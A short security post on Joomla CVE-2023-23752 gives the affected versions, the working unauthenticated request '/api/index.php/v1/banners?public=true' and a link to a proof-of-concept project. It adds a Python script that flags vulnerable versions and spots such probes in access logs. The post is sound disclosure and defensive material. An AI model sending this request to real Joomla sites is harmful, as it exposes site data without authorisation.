Joomla (CVE-2023-23752) - Breaking into the REST API with a request parameter
2023-2-22 14:21:38 Author: Ots安全


Affected versions

Joomla has roughly three routing entry points:

  1. index.php in the web root (visitors reading articles)

  2. administrator/index.php in the web root (administrator back end)

  3. api/index.php in the web root (the REST API for developers)

The unauthenticated interface is exactly this third entry point. Therefore only Joomla 4.0.0 through 4.2.7 are affected (the REST API is an official component of the 4.x series).

Send this request:

http://x.x.x.x/api/index.php/v1/banners?public=true

Other API routes under the same v1 entry point are affected in the same way.

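As an added example (not part of the original post or of the linked project), the following Python checks whether a Joomla version falls in the affected range and scans access-log lines for the public=true request shape described above. The combined log format, the rewritten /api/v1/ path form and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Regex for a common Apache/nginx "combined" access-log line (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Request paths tied to CVE-2023-23752: the /api/index.php/v1/... form from the
# post, plus the rewritten /api/v1/... form (assumed to be enabled on some sites).
API_PATH_RE = re.compile(r'^/api(?:/index\.php)?/v1/')

def parse_version(v):
    return tuple(int(x) for x in v.split('.'))

def is_affected_version(version):
    """Joomla 4.0.0 through 4.2.7 expose the unauthenticated REST entry point."""
    return parse_version('4.0.0') <= parse_version(version) <= parse_version('4.2.7')

def find_public_api_hits(log_lines):
    """Return (ip, path, status) for v1 API requests that carry public=true."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m.group('target'))
        if not API_PATH_RE.match(parts.path):
            continue
        qs = parse_qs(parts.query)
        if 'true' in [x.lower() for x in qs.get('public', [])]:
            hits.append((m.group('ip'), parts.path, int(m.group('status'))))
    return hits

# Constructed sample log lines (not real traffic): two probes using public=true
# on the v1 API, one ordinary site visit, and one v1 request without the parameter.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Feb/2023:14:21:38 +0000] "GET /api/index.php/v1/banners?public=true HTTP/1.1" 200 512 "-" "curl/7.81.0"',
    '203.0.113.5 - - [22/Feb/2023:14:21:40 +0000] "GET /api/index.php/v1/contacts?public=true HTTP/1.1" 200 1844 "-" "curl/7.81.0"',
    '198.51.100.7 - - [22/Feb/2023:14:22:01 +0000] "GET /index.php/component/content/article/1 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Feb/2023:14:22:05 +0000] "GET /api/index.php/v1/content/articles HTTP/1.1" 401 120 "-" "python-requests/2.28"',
]

if __name__ == '__main__':
    for ip, path, status in find_public_api_hits(SAMPLE_LOG):
        print(f'{ip} requested {path} with public=true (HTTP {status})')
```

A hit with HTTP 200 on an instance in the affected range is the case to treat as a likely data exposure and to follow with the 4.2.8 upgrade.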

Project: https://github.com/Saboor-Hakimi/CVE-2023-23752


Source: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247496615&idx=3&sn=d584daf23bc94bc66c4f65c89169235f&chksm=9badbaecacda33fae3c56198787a6c54968bd5e2db32e7fa2d2fbdc72c9add180db4197533e8#rd